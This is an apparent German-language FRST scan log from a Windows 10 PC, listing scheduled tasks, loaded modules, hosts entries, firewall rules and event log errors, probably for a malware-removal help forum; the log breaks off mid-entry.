Task: {D8BE461C-A4D8-42DA-AE54-5F8EE4F14A4C} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {EBB40F5C-27CF-4EFB-9BB3-3686877F37F9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {F011C2A7-F537-4042-A617-38FCAEAB5040} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {F09EBB43-33EB-408B-89C5-83509D122E8A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {FA8B6B6B-08BB-4111-BF4B-ED063CD35F62} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {FBCCA871-C023-45D2-AF9F-88E91AA5ED84} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-08-21 18:05 - 2015-10-13 05:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2016-02-18 22:07 - 2016-03-30 03:21 - 00366528 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2015-12-21 18:26 - 2016-03-30 03:21 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-04-14 23:45 - 2016-03-30 03:21 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-02-18 22:07 - 2016-03-30 03:22 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2015-11-05 02:11 - 2015-11-05 02:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2016-04-14 23:45 - 2016-03-30 03:21 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-04-14 23:45 - 2016-03-30 03:21 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-04-14 23:45 - 2016-03-30 03:22 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-02-05 23:20 - 2016-03-30 03:22 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-04-14 02:24 - 2016-03-22 04:37 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-02-13 19:02 - 2016-02-13 19:02 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-14 03:21 - 2016-04-14 03:21 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-14 23:45 - 2016-03-30 03:20 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-04-14 23:45 - 2016-03-30 03:20 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-04-14 12:08 - 2016-04-14 12:08 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-10 10:56 - 2016-03-10 10:56 - 10244608 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_2016.29.13.0_x64__8wekyb3d8bbwe\WinStore.Entertainment.Mobile.dll
2016-03-29 14:13 - 2016-03-29 14:13 - 00016896 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2016-03-29 14:13 - 2016-03-29 14:13 - 17535488 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2016-03-04 11:52 - 2016-03-04 11:52 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2015-07-22 17:54 - 2015-07-22 17:54 - 00063376 _____ () C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\zlib1.dll
2014-03-20 11:43 - 2014-03-20 11:43 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 00123344 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 00135816 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 02890240 _____ () C:\Program Files\AVAST Software\Avast\defs\16041401\algo.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 00309912 _____ () C:\Program Files\AVAST Software\Avast\browser_pass.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 00478144 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-04-15 11:07 - 2016-04-15 11:07 - 02890240 _____ () C:\Program Files\AVAST Software\Avast\defs\16041500\algo.dll
2015-08-21 01:27 - 2016-03-30 03:28 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-08-21 01:14 - 2016-03-11 02:56 - 00783360 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-08-21 01:14 - 2015-07-03 18:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-08-21 01:14 - 2016-03-31 22:55 - 02549840 _____ () C:\Program Files (x86)\Steam\video.dll
2015-08-21 01:14 - 2016-02-09 01:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2015-08-21 01:14 - 2016-02-09 01:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2015-08-21 01:14 - 2016-02-09 01:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2015-08-21 01:14 - 2016-02-09 01:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2015-08-21 01:14 - 2016-02-09 01:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2015-08-21 01:14 - 2015-07-03 18:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-08-21 01:14 - 2015-07-03 18:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2015-08-21 01:14 - 2016-03-31 22:55 - 00829008 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-10 02:23 - 2016-02-18 00:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2015-08-21 01:14 - 2016-02-09 03:33 - 48400672 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2016-01-06 03:11 - 2016-01-06 03:11 - 00137728 _____ () C:\ProgramData\Razer\Synapse\CrashReporter\CrashRpt1402.dll
2015-08-21 01:14 - 2015-09-25 01:56 - 00119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2016-04-15 01:30 - 2016-04-15 01:30 - 40539648 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2016-04-14 12:08 - 2016-04-14 12:08 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-14 12:08 - 2016-04-14 12:08 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\hola.org -> hxxp://hola.org
IE trusted site: HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\sharepoint.com -> hxxps://fhbi.sharepoint.com

==================== Hosts Inhalt: ==========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2016-04-15 01:25 - 00001110 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1      down.baidu2016.com
127.0.0.1      123.sogou.com
127.0.0.1      www.czzsyzgm.com
127.0.0.1      www.czzsyzxl.com
127.0.0.1      down.baidu2016.com
127.0.0.1      123.sogou.com
127.0.0.1      www.czzsyzgm.com
127.0.0.1      www.czzsyzxl.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4129684494-242130120-1963887019-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcel\AppData\Roaming\Mozilla\Firefox\Desktop-Hintergrund.bmp
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\StartupApproved\StartupFolder: => "MultiSkypeLauncher.lnk"
HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-4129684494-242130120-1963887019-1000\...\StartupApproved\Run: => "icq"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [UDP Query User{01E7ABD1-6C6E-48C1-9653-3761770CC737}F:\heroes of the storm\versions\base42178\heroesofthestorm_x64.exe] => (Allow) F:\heroes of the storm\versions\base42178\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{3A37A0A1-4E98-4E30-987E-93E1EF59E46E}F:\heroes of the storm\versions\base42178\heroesofthestorm_x64.exe] => (Allow) F:\heroes of the storm\versions\base42178\heroesofthestorm_x64.exe
FirewallRules: [{BFCF6DC2-8710-4896-9BC5-AA3F43076A92}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [{226ADF02-E5C4-48ED-A363-A689A7C2D07B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe
FirewallRules: [UDP Query User{ECFEF756-48CB-4B10-B49F-69126BFE7574}F:\heroes of the storm\versions\base41810\heroesofthestorm_x64.exe] => (Allow) F:\heroes of the storm\versions\base41810\heroesofthestorm_x64.exe
FirewallRules: [TCP Query User{0004B20E-8DE5-45D2-BB25-3930F2F5D5E7}F:\heroes of the storm\versions\base41810\heroesofthestorm_x64.exe] => (Allow) F:\heroes of the storm\versions\base41810\heroesofthestorm_x64.exe
FirewallRules: [{C6C604AD-6A9D-4CF2-9526-43298398CB9D}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C49E756D-E711-479B-9E22-28907EA12EF9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{65B481B8-7F62-40C6-AA38-4F9E72121322}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{7E7D5060-AD89-47E0-8502-AD4BA30EE967}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{3916A2B9-8423-44A9-B185-971DD97BB37C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [UDP Query User{E2ABCCE1-B507-4D63-9BC3-3EB4AD0889D7}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [TCP Query User{36FE7A07-E25D-415E-9892-3B05BE1BB7FD}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [{71B9FFAF-BBC1-4801-95BC-CD2A7FBDD090}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe
FirewallRules: [{5C060D77-0BFB-43A1-A384-0BA54F5B4BDE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Stardew Valley\Stardew Valley.exe
FirewallRules: [{BC640CC4-86E3-4D6E-A5BA-BBBF8F38351E}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Tom Clancy's The Division\TheDivision.exe
FirewallRules: [{93B597CD-7361-4E9A-B6F5-21EEA7DECC1C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5D3C6888-64E8-4A20-924D-66B2163486E3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EE395307-DAE4-4EB1-8787-B9215AC7F7F1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{69250942-E427-4D95-9321-4C5AA8392FFC}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{6D15B2BF-8543-4142-A1FD-06093199B981}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{6976E2AF-BEC7-4B15-A84E-DE3971ED07B5}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [UDP Query User{96F7ED3D-46BA-4325-86E0-DC2B6F1E9A01}C:\program files (x86)\activision\call of duty - black ops iii\blackops3.exe] => (Allow) C:\program files (x86)\activision\call of duty - black ops iii\blackops3.exe
FirewallRules: [TCP Query User{46276E5C-5059-4634-BAA2-4F8893815FFD}C:\program files (x86)\activision\call of duty - black ops iii\blackops3.exe] => (Allow) C:\program files (x86)\activision\call of duty - black ops iii\blackops3.exe
FirewallRules: [{09433DDA-A252-4705-9494-908E58170686}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{7CC0A99D-6DB6-4C39-97FD-94FCB81BE58A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{42F2A028-1076-4212-AD01-EA35A8CDBED5}] => (Allow) F:\Battle.net\Battle.net.exe
FirewallRules: [{A6DDF173-D8AC-419F-95F7-1921E331EB79}] => (Allow) F:\Battle.net\Battle.net.exe
FirewallRules: [{A914BEDA-FE0A-495B-91D0-85EA5479704B}] => (Block) %ProgramFiles% (x86)\Grand Theft Auto V\GTA5.exe
FirewallRules: [{7CDABEEC-FB41-4A21-B4F5-F27633D0FFED}] => (Block) %ProgramFiles% (x86)\Grand Theft Auto V\GTA5.exe
FirewallRules: [UDP Query User{2E800118-5A9B-4A50-90DF-311BEFA8AEDD}C:\program files (x86)\grand theft auto v\gta5.exe] => (Block) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [TCP Query User{EAC53A65-B778-4345-8B86-7ACE8AF4CA82}C:\program files (x86)\grand theft auto v\gta5.exe] => (Block) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [{706E2F24-EF8D-4419-9B3F-712E76F13013}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{78F2B443-EF70-421D-AEB2-F60436734855}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{19A48AD6-D36C-4661-B2C8-0C2AD0E723CD}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [UDP Query User{05CDBBF2-24C9-40D2-AB26-5BA86BF76B02}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [TCP Query User{7860F02B-807A-4887-A77B-0A73D57AA42C}C:\mirc\mirc.exe] => (Allow) C:\mirc\mirc.exe
FirewallRules: [UDP Query User{C6FD01EB-D585-429D-975F-35326D4D838E}C:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [TCP Query User{C440780C-BB0D-4070-A4B5-D0444F03508C}C:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{F6B8026E-BB0A-473F-A42F-6BC5319EA92D}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{EF0EBD70-61DF-4254-84A9-095ED6CD3D17}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2cfg.exe
FirewallRules: [{EC69D230-E0D6-42CB-96C9-9DB0653FD0A7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{01C3DFB7-9E14-41E3-894A-E30476B22EC8}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win32\dota2.exe
FirewallRules: [{612AA9EA-D6AC-4D7D-9271-3A61ADB26306}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [{86EA75D8-B2C0-4C09-8991-5FC2081A1D87}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\dota.exe
FirewallRules: [{F8AADE67-58BE-4722-9EA0-E42E0C5A7DE3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E12D0A74-586E-4763-8A6F-1B3AFF33AF61}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{88673442-CC6E-462D-B306-F763D8B85D69}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{12FF25C4-6DC8-48E0-8472-789C8DA98E79}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{C940C38A-5292-4DB0-AE54-E932002AE04F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{E3AD077E-FE9A-4D2A-9EC7-E799029BBC15}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{10EF654C-001D-49B5-9B21-8834A35DF128}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{662B908E-64A2-424B-B460-8F795843094D}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{C4B94B08-405B-46EF-ABB6-D9FA9F1C1B89}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{B20450F4-E988-4C99-9B2D-4B265E2786F2}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3E379FA-EF93-4B78-8BC4-AA8BC6184F9E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{CEDA824C-C914-46F0-9760-AB90ECD575AE}E:\mirc\mirc.exe] => (Allow) E:\mirc\mirc.exe
FirewallRules: [UDP Query User{7811D32B-286B-4A58-8712-CE0D543D9CA4}E:\mirc\mirc.exe] => (Allow) E:\mirc\mirc.exe
FirewallRules: [{1E1E82EF-071E-4BA3-8ECE-7B8040130ED2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{021CD02A-1345-431E-9AA6-6297EEF1D350}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{EBBB15FE-2C6E-463F-B054-E05BAC107743}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{4D6396BF-E80A-440B-98C1-DAF1ABDA3527}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{D1610E9F-86CC-44A9-BC8A-196927281C78}] => (Allow) C:\Windows\SysWOW64\muzapp.exe

==================== Wiederherstellungspunkte =========================

15-04-2016 00:00:53 Removed Samsung Kies
15-04-2016 00:51:18 JRT Pre-Junkware Removal

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Cisco Systems
Service: vpnva
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/15/2016 01:27:41 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: NvStreamNetworkService.exe, Version: 7.1.2059.1762, Zeitstempel: 0x56fb173e
Name des fehlerhaften Moduls: RtspServer.dll_unloaded, Version: 0.0.0.0, Zeitstempel: 0x56fb10e5
Ausnahmecode: 0xc0000005
Fehleroffset: 0x000000000000a438
ID des fehlerhaften Prozesses: 0x1124
Startzeit der fehlerhaften Anwendung: 0xNvStreamNetworkService.exe0
Pfad der fehlerhaften Anwendung: NvStreamNetworkService.exe1
Pfad des fehlerhaften Moduls: NvStreamNetworkService.exe2
Berichtskennung: NvStreamNetworkService.exe3
Vollständiger Name des fehlerhaften Pakets: NvStreamNetworkService.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NvStreamNetworkService.exe5

Error: (04/15/2016 12:51:18 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (04/15/2016 12:24:40 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe, Version: 10.0.10586.0, Zeitstempel: 0x5632d7ba
Name des fehlerhaften Moduls: ESENT.dll, Version: 10.0.10586.212, Zeitstempel: 0x56fa1686
Ausnahmecode: 0xc0000602
Fehleroffset: 0x000000000022885f
ID des fehlerhaften Prozesses: 0xb6c
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe0
Pfad der fehlerhaften Anwendung: svchost.exe1
Pfad des fehlerhaften Moduls: svchost.exe2
Berichtskennung: svchost.exe3
Vollständiger Name des fehlerhaften Pakets: svchost.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: svchost.exe5

Error: (04/15/2016 12:24:40 AM) (Source: ESENT) (EventID: 908) (User: )
Description: svchost (2924) Der Prozess wird aufgrund eines nicht behebbaren Fehlers beendet: PV: 10.0.10586.0 SV: 10.0.10586.0 GLE: 0 ERR: -1601(dir.cxx:753): dllentry.cxx(103) (ESENT[10.0.10586.0] RETAIL RTM MBCS)

Error: (04/15/2016 12:02:00 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: NvStreamNetworkService.exe, Version: 7.1.2059.1762, Zeitstempel: 0x56fb173e
Name des fehlerhaften Moduls: NvMdnsPlugin.dll_unloaded, Version: 0.0.0.0, Zeitstempel: 0x56fb1c2b
Ausnahmecode: 0xc0000005
Fehleroffset: 0x00000000000d45a0
ID des fehlerhaften Prozesses: 0x2fd0
Startzeit der fehlerhaften Anwendung: 0xNvStreamNetworkService.exe0
Pfad der fehlerhaften Anwendung: NvStreamNetworkService.exe1
Pfad des fehlerhaften Moduls: NvStreamNetworkService.exe2
Berichtskennung: NvStreamNetworkService.exe3
Vollständiger Name des fehlerhaften Pakets: NvStreamNetworkService.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: NvStreamNetworkService.exe5

Error: (04/15/2016 12:01:58 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: svchost.exe, Version: 10.0.10586.0, Zeitstempel: 0x5632d7ba
Name des fehlerhaften Moduls: ESENT.dll, Version: 10.0.10586.212, Zeitstempel: 0x56fa1686
Ausnahmecode: 0xc0000602
Fehleroffset: 0x000000000022885f
ID des fehlerhaften Prozesses: 0xa04
Startzeit der fehlerhaften Anwendung: 0xsvchost.exe0
Pfad der fehlerhaften Anwendung: svchost.exe1
Pfad des fehlerhaften Moduls: svchost.exe2
Berichtskennung: svchost.exe3
Vollständiger Name des fehlerhaften Pakets: svchost.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: svchost.exe5

Error: (04/15/2016 12:01:58 AM) (Source: ESENT) (EventID: 908) (User: )
Description: svchost (2564) Der Prozess wird aufgrund eines nicht behebbaren Fehlers beendet: PV: 10.0.10586.0 SV: 10.0.10586.0 GLE: 0 ERR: -1603(fucb.cxx:359): dllentry.cxx(103) (ESENT[10.0.10586.0] RETAIL RTM MBCS)

Error: (04/15/2016 12:00:53 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer".

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft-Verbindungsschichterkennungsprotokoll.

System Error:
Zugriff verweigert
.

Error: (04/14/2016 11:10:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: ekrn.exe, Version: 9.0.374.1, Zeitstempel: 0x56cc5c2d
Name des fehlerhaften Moduls: combase.dll, Version: 10.0.10586.103, Zeitstempel: 0x56a849ab
Ausnahmecode: 0xc0000602
Fehleroffset: 0x0000000000074e98
ID des fehlerhaften Prozesses: 0x704
Startzeit der fehlerhaften Anwendung: 0xekrn.exe0
Pfad der fehlerhaften Anwendung: ekrn.exe1
Pfad des fehlerhaften Moduls: ekrn.exe2
Berichtskennung: ekrn.exe3
Vollständiger Name des fehlerhaften Pakets: ekrn.exe4
Anwendungs-ID, die relativ zum fehlerhaften Paket ist: ekrn.exe5

Error: (04/14/2016 06:58:12 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: WmiApRplC:\WINDOWS\system32\wbem\wmiaprpl.dll4


Systemfehler:
=============
Error: (04/15/2016 02:14:44 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
